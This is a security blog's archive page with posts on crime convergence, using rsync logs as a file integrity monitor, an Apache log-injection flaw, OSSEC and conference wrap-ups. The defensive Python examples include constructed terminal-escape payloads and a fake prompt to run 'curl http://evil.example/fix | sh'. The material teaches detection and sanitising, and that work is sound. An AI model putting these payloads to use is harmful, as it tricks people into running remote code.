Category Archives: Security

Crime Convergence


Convergence isn’t a new concept in information security. For a while now, we have been speaking about “security convergence”: two principles or functions that were distinct at the beginning are mixed to tend toward or achieve union or a common conclusion or result (as defined by Wikipedia). A good example is the combination of physical and logical security controls: to improve the authentication and authorization processes, we can use two different factors, something we “know” (a PIN, a password) and something we “have” (a token or smartcard). Security convergence is also used to detect incidents or suspicious activities. You could correlate data generated by a badge reader (physical security) with an Active Directory event (logical security): a user who swiped his badge to enter building “A” but opens a session on a desktop located in building “B” can be considered suspicious.

Today, I read an interesting piece of news reported on Twitter. It was published by the Dutch portal transport-online.nl, which compiles news about freight. Nothing related to information security at first sight, but quite interesting anyway. The portal reported that drug criminals hacked the websites of two container terminals operating in the port of Antwerp. Why? Today, computers control more and more infrastructure, and containers are no exception. Every container can be tracked throughout its journey: when it was (un)loaded on boats, trains or trucks, where it was stored (position), etc. Such information can be very valuable for criminals, especially if the containers hold drugs. The hackers used the compromised systems to locate their precious goods.

This is a very good example of “crime convergence“: to achieve their goals, criminals do not hesitate to mix regular crime with cyber-crime. I’m pretty sure that the two hacked companies never imagined being a target for cyber criminals (“Hey, who would be interested in the position of our containers?“). Don’t forget that data handled by your organization might be very valuable to some people with bad intentions.

Here is a link to the article: Drugshandelaren hacken rederijen en ontvreemden containers met cocaïne (in Dutch – translation in English here).

 

File Integrity Monitoring for the Poor

For most organizations, security has a huge impact on budgets… except if you’re called the NSA and must deploy a massive surveillance program! Every time you need money, you have to fight with your boss or the finance guys to get some bucks, after explaining why a new piece of software, appliance or consultant will help you improve the security of their data. But sometimes you can use data generated by non-security-related solutions and extract some added value from it. When I say “non-security-related“, it’s not 100% true; let me explain…

Even if information security is difficult to explain to the business, C-level people generally understand and agree on the need for backup systems. Ok, still today not all organizations have a strong backup procedure (and even fewer have a strong restore procedure!), but let’s assume it. Basically (I’m not a backup expert), there are two major ways to perform a backup. At the beginning of the week, we make a full backup on Monday and:

  • Perform a differential backup every day (everything changed since the full backup)
  • Or perform an incremental backup every day (everything changed since the previous day’s backup)

The next Monday, a new full backup is performed and closes the loop. Another very useful tool to track changes on a server is a FIM (“File Integrity Monitor“). Such a solution helps detect suspicious changes in directories on a server. Classic examples of directories monitored on a UNIX server are /etc (where configuration files reside) and /usr/bin & /usr/sbin (where system binaries reside). Usually, they don’t change often. But deploying a commercial FIM solution can be expensive. Idea: which other kind of tool also scans filesystems for changes? Backup tools, of course!

In my case, my servers are backed up every night via rsync to a central storage, and rsync writes to a file the list of all files modified since the last backup. Why not parse this file and search for suspicious modifications? You could also process this file via Splunk and do some correlation or alerting on the indexed data. Finding a reference to /etc/passwd in my nightly rsync backup log would be very suspicious if no new user was created by myself or another admin!
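As an added example (not the script from the original post), here is a small Python parser for rsync’s itemized change list, run over a constructed sample of log lines. It assumes the backup is launched with --itemize-changes (rsync -ai), so every transferred item is listed as “YXcstpoguax path”, and that the rsync source is “/”, so the listed paths are relative to the root filesystem. The watched directories and alert rules are my own choices, not something the post prescribes.

```python
"""Poor man's FIM: scan the change list written by a nightly rsync backup.

Added example, not the script from the original post. It assumes the backup
runs with --itemize-changes (rsync -ai), so every transferred item is listed
as "YXcstpoguax path", and that the rsync source is "/" (paths are relative
to the root filesystem). The sample log below is constructed.
"""
import re
import sys
from dataclasses import dataclass
from typing import Iterable, List, Optional

# rsync -i line: Y = update type (> < c h . *), X = file type (f d L D S),
# then one flag per attribute: c=checksum s=size t=mtime p=perms o=owner
# g=group, u/a/x = other attributes; "+" means newly created, "." unchanged.
ITEMIZE_RE = re.compile(
    r"^(?P<upd>[<>ch.*])(?P<ftype>[fdLDS])(?P<attrs>[.+?cstpoguax]{9,11}) (?P<path>.+)$"
)
DELETE_RE = re.compile(r"^\*deleting\s+(?P<path>.+)$")   # printed with --delete

SYSTEM_BIN_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                   "/usr/local/bin/", "/usr/local/sbin/")
ACCOUNT_FILES = {"/etc/passwd", "/etc/shadow", "/etc/group", "/etc/sudoers"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class Change:
    kind: str    # created | modified | attrs (metadata only) | deleted
    ftype: str   # f=file d=dir L=symlink D=device S=special, ? when deleted
    path: str    # absolute path rebuilt from rsync's relative form


def parse_itemized(line: str) -> Optional[Change]:
    """Turn one rsync -i line into a Change, or None for summary/progress lines."""
    line = line.rstrip("\n")
    m = DELETE_RE.match(line)
    if m:
        return Change("deleted", "?", "/" + m.group("path").lstrip("/"))
    m = ITEMIZE_RE.match(line)
    if not m:
        return None
    attrs = m.group("attrs")
    path = "/" + m.group("path").lstrip("/")
    if attrs.startswith("+"):
        kind = "created"
    elif "c" in attrs or "s" in attrs:
        kind = "modified"          # checksum or size differs: content changed
    elif attrs.strip(".") == "":
        return None                # listed but nothing changed
    else:
        kind = "attrs"             # only mtime / perms / owner / group changed
    return Change(kind, m.group("ftype"), path)


def classify(ch: Change) -> Optional[str]:
    """Return an alert for changes an admin should look at, None for routine ones."""
    p = ch.path
    if ch.kind == "deleted" and p.startswith("/var/log/"):
        return f"HIGH log file removed: {p}"
    if p in ACCOUNT_FILES and ch.kind in ("created", "modified"):
        return f"HIGH account database changed: {p}"
    if p.startswith("/etc/ssh/") and ch.kind != "attrs":
        return f"HIGH sshd config or host key changed: {p}"
    if p.startswith(SYSTEM_BIN_DIRS) and ch.kind == "created":
        return f"HIGH new binary in system path: {p}"
    if p.startswith(SYSTEM_BIN_DIRS) and ch.kind == "modified":
        return f"HIGH system binary modified: {p}"
    if p.startswith("/etc/") and ch.kind != "attrs":
        return f"MEDIUM configuration changed: {p}"
    if (ch.ftype == "d" and ch.kind == "created" and p.startswith(SCRATCH_DIRS)
            and p.rstrip("/").rsplit("/", 1)[-1].startswith(".")):
        return f"MEDIUM hidden directory created in scratch space: {p}"
    return None


def scan(lines: Iterable[str]) -> List[str]:
    """Run the rules over an rsync change list and return the alerts in order."""
    alerts = []
    for line in lines:
        ch = parse_itemized(line)
        if ch is not None:
            alert = classify(ch)
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample of what "rsync -ai --delete / backup:/srv/hosts/web1/" prints.
SAMPLE_LOG = """\
>f.st...... etc/passwd
>f.st...... etc/shadow
>f+++++++++ usr/local/bin/nc
cd+++++++++ var/tmp/.x/
>f+++++++++ var/tmp/.x/kernel
>f.st...... var/log/syslog
.d..t...... home/alice/
>f.st...... home/alice/.bashrc
*deleting   var/log/auth.log
sent 1,234 bytes  received 56 bytes  2,580.00 bytes/sec
"""

if __name__ == "__main__":
    src = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG.splitlines()
    for a in scan(src):
        print(a)
```

Routine changes (a growing /var/log/syslog, a user editing his .bashrc) produce nothing; the account files, the new binary in /usr/local/bin, the hidden directory under /var/tmp and the deleted auth.log each raise an alert. In production, keep the change list on the backup host rather than on the backed-up server, so an intruder cannot edit it, and feed the alerts to Splunk or syslog the same way.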

Conclusion: if you don’t have money, have ideas! Any data or log file can be valuable and help you increase your overall security.

June 2013 OWASP Belgium Chapter Meeting Wrap-Up


I’m back from the last OWASP Belgium chapter meeting. Here is a quick wrap-up. Classic scenario: the event started with Seba, who gave some updates about the OWASP foundation. Today’s event was part of a bigger one called the OWASP European Tour: over a few weeks, all European chapters organise a local event. There is also a CTF organised. Some interesting new projects were highlighted:

If you’re not an OWASP member yet, there is currently a cool action ongoing called “Membership drive“. Have a look at it. That’s the news for this time. Now, let’s review the scheduled talks.
The first speaker was Eoin Keary: “Needles in haystacks, we are not solving the app sec problem & html hacking the browser, CSP is dead“. Today it’s easy to find good examples of data breaches in your country; they can be used to demonstrate to your boss that security is more and more important. Why is it easier to find examples? Because of the increasing number of attacks (ex: from hacktivists). Most big organisations in the world have already been hacked, even those with huge security budgets. Is that normal? We spend a lot of money on security but the cost of security incidents increases too (huge business impact). “There’s money in them there web apps”, said Eoin. Every application is unique and therefore is not properly secured. Compare that with networks, which are easier to configure: everybody talks TCP/IP and uses ports, so put a firewall in place and you’re (almost) done. You can’t do the same with web apps. Eoin’s first conclusion is that we are doing it wrong. Nothing new, but what is the problem?
According to Eoin, we are facing an asymmetric arms race. An annual pentest cycle gives minimal security, and a pentest gives no guarantee of results. Web applications are too complex to be covered from A to Z: think about 50 variables which could each be vulnerable to x CVEs; it’s impossible to review all the test cases in a reasonable amount of time. Pentesting can be compared to the visible part of the iceberg. A pentester has “x” days to perform the tests while an attacker has plenty of time. Also, are the testers as good as the bad guys? How experienced are they? When new code is pushed to production, vulnerabilities might be present until the next pentest (in weeks, months, years?). Are you sure that your testing tools don’t have security flaws or bugs too? Then Eoin gave examples of vulnerabilities that cannot be discovered by tools, only by human intelligence (ex: business logic). The examples were HTML injection tricks that need no JavaScript and are therefore not stopped by CSP (“Content Security Policy“):
  • Single quote issue (HTML injection, dangling quote)
  • Form rerouting
  • <base> jumping
  • Element override (<input> attributes in HTML5)
  • Hanging <textarea>
To sum up: blackbox tests are useful to prove that applications are vulnerable, but they are not the best way to secure an application (some risks remain). The only way is to perform code review. Eoin compared security with cheeseburgers: they are tasty, we know that they are bad for us, but who cares? We write insecure code until we get hacked! That is called the cheeseburger approach. Excellent talk, I liked it!
The second talk was “Teaching an old dog new tricks: securing development with PMD” by Justin Clarke. For a while now, tools have existed to search for bugs in source code. Some perform static analysis, others dynamic analysis. But the tools used by developers are meant to catch code quality issues and address security less (or not at all).
The idea explained by Justin was to extend existing solutions to perform security checks too. He focused on PMD. First, what is PMD? In the audience, only one guy was using this tool. It’s an open source static analyser for Java source code. It searches for lots of bugs, but not really security-related ones. Justin’s presentation was about extending PMD with self-written security checks. It’s quite easy to extend… if you are a developer. Personally, the talk went too deep for me. Custom rules are written as XPath expressions. With my very basic knowledge, I found this like using grep to search for some patterns in the source code.
After a short break, the last guest, Aram Hovsepyan, talked about “Vulnerability prediction in Android applications“. Why? Android is an attractive target (75% market share in Q1 2013) and the number of apps keeps growing. App security is not guaranteed by the platform provider (read: Google, for example).
So, a single vulnerability could affect a large number of users, and Android apps are not yet massively scanned (compared to regular applications for PC/Mac). How to find vulnerabilities?
  • Code inspection
  • Penetration testing / security testing
  • Static code analysis
  • With some “magic” – vulnerability prediction models!
That’s what Aram is doing, using what he calls a “magic ball” (machine learning). The model will not say “this line of code is dangerous” but “have a look at this file, it might be suspicious“. What are the existing tools & techniques?
  • Size of a component (large components are more likely to be vulnerable)
  • Fetch the features from the components
  • Determine the vulnerabilities (there exist public databases such as MFSA or the National Vulnerability Database)
  • Investigate the correlation
Some other interesting points to keep an eye on:
  • Developer activity
  • Number of import statements
What’s the approach used by Aram? Use the source code itself in tokenised form, and the token frequencies as features. Static code analysis is performed using Fortify; each file is labelled either clean or vulnerable. Tokens and vulnerability labels are used to build a prediction model (machine learning). Experiment #1: can we predict a future version of an app based on its first version? Experiment #2: can we build a generalised predictor that works on all apps? Based on the results, what are the most influential features?
  • Error handling
  • “if” (branching – app complexity)
  • Null (pointer algebra)
  • Java, org (import statements)
  • New, Log (others)
Conclusions: it worked quite well for Java files in Android apps, and they are now trying to apply the same technique to Firefox and PHP code. The presentation started with interesting ideas but, slide after slide, it became more complex and fuzzy. Again, I’m not a developer. That’s all for this time!

Logs: For Better or For Worse?

Last week, a vulnerability in Apache was disclosed. More precisely, the issue was located in the mod_rewrite module, which rewrites (now you understand its name) URLs on the fly. This is very useful during web page migrations, attack mitigations, etc. The security flaw does not affect the core feature of this module but the way it writes events to the Apache log file: the output is not properly sanitized, so a crafted request can plant terminal escape sequences in the log, which could lead to the execution of arbitrary commands when the logs are displayed in a terminal emulator. This is not the first time that log files are vulnerable to such injections. Another product affected by this issue was Fail2ban in 2012 (CVE-2012-5642).
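To make the failure mode concrete, here is an added Python example (not code from the post, nor from Apache or Fail2ban) that shows a log line written raw next to the same line written with control characters escaped, plus a check you can run over existing log files. The attack payloads and the log format are constructed for the example.

```python
"""Escape log items before writing them, so a terminal never interprets them.

Added example, not code from the post or from Apache/Fail2ban. It mimics the
defensive step a log writer should take (control bytes become \\xHH escapes)
next to the flawed raw write, and offers a check for existing log files.
The attack payloads below are constructed.
"""
import re
import sys

# Bytes a terminal emulator may act on: C0 controls (ESC 0x1b, BEL 0x07, ...),
# DEL and the C1 range 0x80-0x9f (8-bit CSI/OSC). Backslash is escaped as well
# so that an escaped item can never be confused with a raw one.
_UNSAFE = re.compile(r"[\x00-\x1f\x7f-\x9f\\]")
_CONTROL = re.compile(r"[\x00-\x1f\x7f-\x9f]")


def escape_logitem(item: str) -> str:
    """Replace backslash by \\\\ and every control character by \\xHH."""
    return _UNSAFE.sub(
        lambda m: "\\\\" if m.group(0) == "\\" else "\\x%02x" % ord(m.group(0)),
        item,
    )


def format_access_line(remote: str, request: str, user_agent: str, sanitize: bool) -> str:
    """Build a combined-log-format line; sanitize=False is the flawed behaviour."""
    f = escape_logitem if sanitize else (lambda s: s)
    return '%s - - [10/May/2013:12:00:00 +0200] "%s" 200 512 "-" "%s"' % (
        remote, f(request), f(user_agent))


def contains_terminal_controls(line: str) -> bool:
    """Detection side: True if a stored line still carries raw control bytes."""
    return _CONTROL.search(line) is not None


# Constructed payloads: an OSC sequence that retitles the window and a CSI
# sequence that clears the screen and prints a fake red message.
ATTACK_REQUEST = "GET /?q=\x1b]0;owned\x07 HTTP/1.1"
ATTACK_UA = "\x1b[2J\x1b[1;31mALERT: run 'curl http://evil.example/fix | sh'\x1b[0m"

if __name__ == "__main__":
    if len(sys.argv) > 1:            # audit an existing access log
        with open(sys.argv[1], errors="replace") as fh:
            for n, line in enumerate(fh, 1):
                line = line.rstrip("\n")
                if contains_terminal_controls(line):
                    print("line %d: raw control bytes: %s" % (n, escape_logitem(line)))
    else:
        print(format_access_line("10.0.0.5", ATTACK_REQUEST, ATTACK_UA, sanitize=True))
```

Run it with a log file as argument to find lines that would still be interpreted by a terminal when you “tail -f” or “cat” them; a quick equivalent on the shell is grep with a pattern for the ESC byte. Escaping at write time is the real fix; the check only tells you whether someone has already tried.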


SOURCE Dublin Wrap-Up Day #2


I’m writing this wrap-up from the Dublin airport, waiting for my flight back to Belgium. This new edition of SOURCE is already over. What did we learn today?


SOURCE Dublin Wrap-Up Day #1


I flew to Dublin, Ireland on Wednesday evening to attend the SOURCE conference (previously, it was organised in Barcelona). The conference was held at Trinity College, in the centre of the city. This is a really nice place where we slept in student bedrooms (a “kot“, as we say in Belgium), which reminded me of my good old years as a student. Nice atmosphere!

NoSuchCon #1 Wrap-Up


There are so many security conferences around the world… Some people have already debated this: is it better to restrict the annual agenda to well-known events or to let people start their own? IMHO, we need initiatives like this. It’s good to have a broad agenda with local conferences where local people can attend without spending huge amounts of money on travel and lodging (if you can’t go to conferences, let’s bring the conferences to you!). So, let’s welcome the newly born conference called “NoSuchCon“. The first edition was just organized in Paris over the last three days. Unfortunately, I was only able to attend the last day… If only I could expand my holidays like a filesystem! :-) I reached Paris early in the morning to attend the first keynote. Here is a quick review of the day.


Improving File Integrity Monitoring with OSSEC

FIM or “File Integrity Monitoring” can be defined as the process of validating the integrity of operating system and application files by computing a hash with an algorithm like MD5 or SHA1 (today SHA-256 is preferable, MD5 being collision-prone) and comparing the current file state with a baseline. A hash allows the detection of changes to file content, but other information can be checked too: owner, permissions, modification time. Implementing file integrity monitoring is a very good way to detect compromised servers. Not only operating system files can be monitored (/etc on UNIX, the registry on Windows, shared libraries, etc) but also applications (monitoring your index.php or index.html can reveal a defaced website).

During its implementation, a file integrity monitoring project may face two common issues:

  • The baseline the current file state is compared with must, of course, be trusted. To achieve this, it must be stored in a safe place where an attacker cannot find it and cannot alter it!
  • The process must be fine-tuned to react only on important changes; otherwise there are two risks: the real suspicious changes will be hidden in a massive flow of false positives, and the people in charge of the control could miss interesting changes.
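As an added example (not OSSEC’s code, nor the patch discussed in this post), here is a minimal FIM in Python that implements the definition above: it hashes files, records owner, permissions and modification time, diffs against a baseline, and addresses the first issue by protecting the baseline with an HMAC. It assumes SHA-256 instead of MD5/SHA1 and assumes the HMAC key is provisioned out of band and not stored on the monitored host; demo() exercises it on constructed files in a temporary directory.

```python
"""Minimal file integrity monitor with an authenticated baseline.

Added example, not OSSEC's code. It hashes the regular files under a set of
directories (SHA-256 here, chosen over MD5), records the metadata an intruder
may alter (size, mode, owner, group, mtime) and protects the baseline with an
HMAC whose key is assumed to be kept off the monitored host. demo() exercises
it in a temporary directory with constructed files.
"""
import hashlib
import hmac
import json
import os
import shutil
import stat
import tempfile
from typing import Dict, List, Tuple

State = Dict[str, object]


def file_state(path: str) -> State:
    """Hash plus the metadata worth comparing, for one file (symlinks not followed)."""
    st = os.lstat(path)
    h = hashlib.sha256()
    if stat.S_ISREG(st.st_mode):
        with open(path, "rb") as fh:
            for chunk in iter(lambda: fh.read(65536), b""):
                h.update(chunk)
    return {"sha256": h.hexdigest(), "size": st.st_size, "mode": oct(st.st_mode),
            "uid": st.st_uid, "gid": st.st_gid, "mtime": int(st.st_mtime)}


def build_baseline(roots: List[str]) -> Dict[str, State]:
    """Walk the monitored directories and record the state of every file."""
    baseline: Dict[str, State] = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                p = os.path.join(dirpath, name)
                baseline[p] = file_state(p)
    return baseline


def save_baseline(baseline: Dict[str, State], key: bytes) -> bytes:
    """Serialise the baseline with an HMAC-SHA256 tag over the body."""
    body = json.dumps(baseline, sort_keys=True)
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return json.dumps({"tag": tag, "body": body}).encode()


def load_baseline(blob: bytes, key: bytes) -> Dict[str, State]:
    """Refuse a baseline whose tag does not verify: altered on disk or wrong key."""
    doc = json.loads(blob)
    expected = hmac.new(key, doc["body"].encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, doc["tag"]):
        raise ValueError("baseline authentication failed")
    return json.loads(doc["body"])


def compare(baseline: Dict[str, State], current: Dict[str, State]) -> List[Tuple[str, str]]:
    """Report added, deleted and modified files, naming the attributes that differ."""
    findings = []
    for p in sorted(set(baseline) | set(current)):
        if p not in current:
            findings.append((p, "deleted"))
        elif p not in baseline:
            findings.append((p, "added"))
        else:
            diff = [k for k in baseline[p] if baseline[p][k] != current[p][k]]
            if diff:
                findings.append((p, "modified:" + ",".join(diff)))
    return findings


def demo() -> Dict[str, object]:
    """Baseline a fake root, simulate an intrusion, detect it and a tampered baseline."""
    root = tempfile.mkdtemp()
    key = b"baseline-key-provisioned-out-of-band"   # assumption: not stored on the host
    try:
        for rel, data in {"etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n",
                          "bin/ls": b"\x7fELF ls", "bin/cat": b"\x7fELF cat"}.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(data)
        blob = save_baseline(build_baseline([root]), key)

        # Intruder: adds a uid 0 account, drops a binary, removes a tool.
        with open(os.path.join(root, "etc/passwd"), "ab") as fh:
            fh.write(b"backdoor:x:0:0::/:/bin/sh\n")
        with open(os.path.join(root, "bin/nc"), "wb") as fh:
            fh.write(b"\x7fELF nc")
        os.remove(os.path.join(root, "bin/cat"))

        findings = [(os.path.relpath(p, root), what)
                    for p, what in compare(load_baseline(blob, key), build_baseline([root]))]

        # A baseline the intruder edited on disk must be rejected, not trusted.
        try:
            load_baseline(blob.replace(b"passwd", b"passwx", 1), key)
            tamper_detected = False
        except ValueError:
            tamper_detected = True
        return {"findings": findings, "tamper_detected": tamper_detected}
    finally:
        shutil.rmtree(root)
```

The findings name the attribute that changed (content hash and size for the edited passwd, for instance), which is what lets you tune out noise such as a touched mtime without losing real changes, the second issue listed above. The HMAC only proves the baseline was not altered since it was signed; it does not make the first signing trustworthy, so the baseline must be taken on a clean system.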

There are plenty of tools which implement FIM, commercial as well as free. I settled on OSSEC a while ago; my regular followers know that I already posted a lot of articles about it. I also contributed to the project with a patch to add geolocation to alerts. This time, I wrote another patch to improve the file integrity monitoring feature of OSSEC.


Mine is Bigger Than Yours!

Everybody has already faced the same situation: children like to compare themselves with each other! Put kids in the same room and let them play. Comparisons will start soon: “My dad has a bigger car than yours“, “My plane flies better than yours“, “I can run faster than you“, etc. Sometimes, I feel exactly the same during conversations about infosec products, and I’m pissed off by this. My opinion is that infosec people also tend to be proud of their security solutions and compare them to others. Like in a kindergarten…

It’s a fact, humans don’t like to own up to their errors. It’s not easy to concede a bad choice and say that your security solution does not fulfil its job. But why pretend to have the top-notch-killer-device on the other side? Remember, years ago, the flame war between Linux and Windows users? (Honestly, I took part in this game when I was young.)

Sometimes, colleagues or customers ask me what the best choice is between “x” and “y“. It’s always difficult for me to answer such questions from a cold start. First of all because, most of the time, I don’t have enough background to compare them. Of course, the market is full of studies and analyses like the well-known Gartner magic quadrant. Those can help you make a first selection. Some vendors ask research firms to make a comparison of their product with direct competitors. If they “asked“, it means they also “paid” for this research. In a customer–supplier relation, the customer must be happy. Can we be certain that the results of the study are fully independent? I doubt it…

Personally, I think the best solution is the one which will solve YOUR issue and match YOUR requirements in terms of:

  • Budget
  • Features
  • Integration in your environment
  • Management & Support

Keep in mind that information security is a big marketplace where all vendors would like their share of the cake… Select two or three solutions, ask for live demos, set up a PoC (“Proof of Concept“). This could cost time and money, but you will have all the keys in your hands to make the right decision. Don’t buy a brand, buy a solution!

 

BSidesLondon 2013 Wrap-Up


This was already the third edition of BSidesLondon today! Time flies! Being busy yesterday, I only reached London in the morning and arrived just in time for the administrative tasks (registration, picking up a t-shirt and goodies), grabbing some coffee and shaking some hands. BSidesLondon is definitely growing in size and quality: a huge number of attendees, two tracks, a rookie track, a job fair, workshops and lightning talks. Even the sun was present over London, no fog at all! Two tracks means you have to make choices! Here is a brief overview of my schedule.
